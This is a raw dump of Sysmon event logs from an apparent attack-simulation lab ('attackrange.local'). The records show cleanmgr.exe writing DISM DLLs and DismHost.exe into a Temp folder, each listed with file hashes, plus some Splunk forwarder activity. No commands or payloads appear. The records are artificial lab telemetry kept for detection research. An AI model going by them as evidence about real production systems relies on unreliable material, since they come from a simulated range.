07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\ProvProvider.dll.muiMD5=70AFEC86B6CF677BF8D3C713CA3281FB,SHA256=C8579EC95A51EB663FFC6145F0998C2F1930A6B8146C84C0A9094BCA4E5195A7,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\OSProvider.dll.muiMD5=A464DFEDEA8520616AA9B2ACD166A77F,SHA256=54E985CFF256CEBE82E9EF3E814A5FDA9FF730BCB50265E9BA78DE65A4DE3F42,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\OfflineSetupProvider.dll.muiMD5=CED788DBD9D13D0490B2F642B0B051F6,SHA256=D5DBC0A52B598800EE14569859383525950B865F4816E47E2E73F79AA1C32A09,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\MsiProvider.dll.muiMD5=5AE9ABD6BB469F3AD7B3A4CCD40974BF,SHA256=C2CE66F2F218890AA76F8BAB68B4C0FDCED0688E694F912F3A5BFABFA6CDB5E7,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\LogProvider.dll.muiMD5=0D4519BC8EB58A006E4A5EB993C0DCCF,SHA256=DAFFE67521F9B4657FBFEF9585234CB39293F9B866C0D97D66F675037515BB51,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\IntlProvider.dll.muiMD5=16ACB74928BC55FD4AAC316F3B92E1D7,SHA256=17CB486CADB679C75A27BA6C76E2FE714F4B8DA845E6F795759517D6734F0BC9,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\ImagingProvider.dll.muiMD5=26F5BBF8D6EE90B4F47C18E93D1087FB,SHA256=F41738FEF7140176447ECF371B1117A485E48BA6F3E9AFAA8C4F883ABFAE62DA,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\IBSProvider.dll.muiMD5=0B09FE334215A8E736B2CF08A50D5204,SHA256=DCE9AD3B79F91BEBEDDFCD9E03F1557CB7C6114AC906081E9E046F807093CDF1,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\GenericProvider.dll.muiMD5=956B8B45B92321C0D5975EE9A6C5B773,SHA256=578541D71466CF61EF399023B34EDFCBD915142BE856534AD4D17D25E7CC9F3D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\FolderProvider.dll.muiMD5=DC4E4C2800DC6D98F7893044A21D246B,SHA256=8B4CE62F4E4294E701193C7AE393EB5EB29AA45932D376CB1A03728A140096AE,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\FfuProvider.dll.muiMD5=5ECAD70AC2B3A95CBB42D6FE67D2F726,SHA256=C210389DBB9B7B4A802E4B0C3C708B6F55B086564A01E19CFB183B6AF916C30A,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\DmiProvider.dll.muiMD5=38C2A1560C340537C3AE0CE04BDF7EAA,SHA256=52B06DFD85FB5AB1DCE2BE665CA144B1AE6658F518D1623D9B44C347C482B064,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\DismProv.dll.muiMD5=BD7B77B3EE9A12FF3F5446ECDF80B5C6,SHA256=B972A0B2C4682E9074441B481BD886DE19B8DB3DBA401B88E980B154C14D5A7E,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\DismCore.dll.muiMD5=C901FF639EDFBBE710D6E5882F07CD24,SHA256=9BDA61D23DC50F9AFA82DA94B06B7B9C8229D5ED666D2F5270DAE13100815C27,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\CompatProvider.dll.muiMD5=A2A344CB32B6835744A36D877C952665,SHA256=A74D765B796638A921C4810D1712A08F7A37C9BA9E91F4DFDCB9727611C3D18D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\CbsProvider.dll.muiMD5=179B34BE97A383AF3E757031E7DA964B,SHA256=ABD3824664D1336EE849D89BA178606CC1B1E23E173752D8093F34A5580FA8F4,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.844{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\AssocProvider.dll.muiMD5=386FE7AC95738A0CB6D25DEA662991F1,SHA256=22DC7317108A528BA92C853330598F628B93FFF27CAC34C2F501B806A75261D9,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.844{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\AppxProvider.dll.muiMD5=9FF5081115C2C21D9F85AF7EE6D2CC63,SHA256=107B10A8C1426F1C0D703F06832D740A4CFDCAA596FA0EA147A32A736A7A2A4D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.844{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DmiProvider.dllMD5=FC76385FF00D4A93618D842B41716D8D,SHA256=BBD49A49CFFA8411FFA91B02541F5F3B5333FD9055BC129DDD3B36EB005C34D9,IMPHASH=062B279D8ED4374A0CD0C84620F4BE4Etruetrue 23542300x80000000000000001051404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.844{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismProv.dllMD5=8C7D97E22045AE402EA896F514CEED81,SHA256=76D3202E11BA22D277532A14CAE60E596975C0D8C34C7BE154F453EB1F7C37EF,IMPHASH=0247CB1C8FD55E43A448E359883057DBtruetrue 23542300x80000000000000001051403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.844{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismHost.exeMD5=A59C22B77871CC18970038B7FA43826F,SHA256=CB84B51713BAD689ABB96560E57A71B276D4B28B1C09C7116EE85F5782A1B144,IMPHASH=734010D3430DBD2CA51B599924FE1424truetrue 23542300x80000000000000001051402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.828{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismCorePS.dllMD5=FB88731B484D1FF4AFF5DB75A20799FA,SHA256=EA155388211E0C3CEF2C99BD5F341C9F93F1ECDA6F21096DB6F9DB2110686A52,IMPHASH=65E10DCEA11F7117C161DC7557B87689truetrue 23542300x80000000000000001051401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.828{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismCore.dllMD5=F1AB58CACD95921A04225222D03CDEA0,SHA256=EDE89F377FD46F95639413411CDA072D9FF63E72A399B26AB4870094F145091B,IMPHASH=B7B56C790C8AB7134B0680D8DFE46658truetrue 23542300x80000000000000001051400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.828{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\CompatProvider.dllMD5=E5C1D020198EBEC1D5ABA640C9A600D0,SHA256=A80FD2846E05AB491BDAAFCE8854A04549A852066B82B90D757D9B6A44ADA8C8,IMPHASH=2CDD615C09EED7B572606B2A0C0EFD2Ftruetrue 23542300x80000000000000001051399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.812{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\CbsProvider.dllMD5=D4A64C7C50D0C6BE9F8770177E2264BF,SHA256=E6505F9DBE17DF9E7E52B5FE1720E1F6482B25D262A47A320CF438C5FD5A5797,IMPHASH=99D5DC4FF67AB12670853DD4E32E8358truetrue 23542300x80000000000000001051398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.812{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\AssocProvider.dllMD5=56CB83B3454882509791FBA62832BC87,SHA256=5B01524CC03B6EB58CC9E0FF479014EAF89EE7FDE2791BFF871BC90274D200AC,IMPHASH=83F73507B4613B09C6FA825535D8A81Etruetrue 23542300x80000000000000001051397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.812{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31660C42A1C5A59EA25F11FFC126FD56,SHA256=CAD4E2158744C1B93D153FE4DF35B46F46D16BACBC5F18E58A39C3C27EFDAF1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.812{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\AppxProvider.dllMD5=8F6792DF9EC54934B76A68B1D7B66ECA,SHA256=E57CB2D5CEC5E1354F4E31CD08ADA02FCAA0E2DEA4B28C8F61683BFA3E875C05,IMPHASH=F1558CACACA712554EBD5926B4B3FE52truetrue 23542300x80000000000000001051395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.791{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-winsvc-l1-1-0.dllMD5=09934F0F7227B9489D117C26EC20CD14,SHA256=CBE408A0AFF90986A6A7DDF022F96302B4FADD08A0C3C166CAC7A64D6ABF041D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.791{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-private-l1-1-1.dllMD5=484ED248F1A72C6E4E6F6C3F5A3339ED,SHA256=00E14515FE6FEBBF3C2CFC89A6F1A3D6F48B3E7A5EB08D50DADF69CE3F34CC47,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.791{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-private-l1-1-0.dllMD5=FEBE55EA884F3C1EE45ADE2734AA6BE6,SHA256=CD51DF334A600117133C9C8100DDE766D980456988FD333A40BE5A81C8092340,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.791{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-management-l2-1-0.dllMD5=0D45D811001E0A7683A2B7CA8A883874,SHA256=F44E2A85D7507159AE115C85C3497C57BE4ECB2D6ADDB30A534110266D56F92F,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.791{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-management-l1-1-0.dllMD5=C36912B3A28B06F5BB24FE9BE49DA4D3,SHA256=D737A832C0D595E8E52846C2D748B911D7155E372F43FBB10513CFDE0BBF83B7,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-core-l1-1-1.dllMD5=A86D518BCF3970C17A1768792FDF37FF,SHA256=AB5CC1B14D6BB708B5C87C2622DA886E2119A6997E08108CCE36080385DAEE71,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-core-l1-1-0.dllMD5=A329C75641638E2FFA11087F614FD4C1,SHA256=5071AA303D436407D195EF37889F018BE7E350DA5E690793587458D4C6D308DB,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-sddl-l1-1-0.dllMD5=C6C6C3E4D7CFA93246362901750A94D9,SHA256=6E274ABE823EF8B30629A99D9F942794C9FE6D003021A0C5085B49A7D8611DDE,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-security-provider-L1-1-0.dllMD5=207B5716605CA4850629F3E2FFFA07BB,SHA256=BE6E6284F69C76BE6366EA8D44D85BDBAB6A71DD42E8B5575CFDF671AD58DCA2,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-security-lsapolicy-l1-1-0.dllMD5=FE7AD7265E296947172B8C491E8109D2,SHA256=4D231AC65F0F54BFF45CACFFE7DF3109CF87F78D14960EC8F03654E605AC8ABF,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Security-Lsalookup-L2-1-1.dllMD5=EBD6475839F5C99FB8855A80E0FC2AF1,SHA256=F519C7AA6930DAC83A3045CEEE42F64F26FFC54254D5ABD1B0F7D99C47569A30,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Security-Lsalookup-L2-1-0.dllMD5=AC284A6251F5D26633AF48D918D09628,SHA256=F7A34B793AACF75DA4EAE843B6088C0BAAA8B835EA5F6A65E72EBD9A1479C8A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-cryptoapi-l1-1-0.dllMD5=DE0A49D4B2E9A5FA6762BD191C622B32,SHA256=AB12FEAF15CB313812B01AFE1198B62E72F7702D140830ABAD2CFB6251E82A7C,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-base-l1-1-0.dllMD5=DC4B661366FEAA4ED54FB1004D9E7A3D,SHA256=B4018F8F249CE087DB46F61A0C2E947248A5B71576F511F0B3650433607BC663,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-EventLog-Legacy-L1-1-0.dllMD5=B8B7B02C3C66638EC0BDF49BCF04A680,SHA256=5D1103E89199731DFFF7BF89D7F6484C038D47CC04F730CD5233EDE488272E6A,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Provider-L1-1-0.dllMD5=FEAA05CE6CCB92AA7B2A2C58C049891A,SHA256=31A4AE262E179DF4CA406E1AF90F651935657BB5FD990C675C67E37D5B834CFE,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Legacy-L1-1-0.dllMD5=88450242D5350529CC8E46FD9C3F3B7B,SHA256=312B6BFC89B551F2C4E8FEDAB316DBE01F190CD5E67091AAFB0E6F67616DC745,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Controller-L1-1-0.dllMD5=00A27A81EAAE90C9CED7063013877357,SHA256=DC4EE086FC046E1D7A291EA3B8B13E77B7A252B5C283B8F6C9CEC729070B7822,IMPHASH=00000000000000000000000000000000truetrue 354300x8000000000000000808582Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:48.297{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57336-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808581Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:49.180{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D7B7EF36B178AC7C0E3BCFD4BDD4B16,SHA256=A1E0948DF18AB2583E4FDB6A59738315D7D501E0859E14B0B69ED7B1427F7408,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-eventing-consumer-l1-1-0.dllMD5=61958A4BE8F944BAFB29DF8009541FCD,SHA256=3B7CB5622BEAC7D633A84EE2F7336C8DE1D3D1AA10577D98020081AB67761FAD,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-ClassicProvider-L1-1-0.dllMD5=8500E093D6B36DF1AF271F6EB34227CA,SHA256=99E2CD36104D3EFD4DEC88AD0F4BED1FD1BBFA97CC4FB29DB7F7136290DD6B70,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 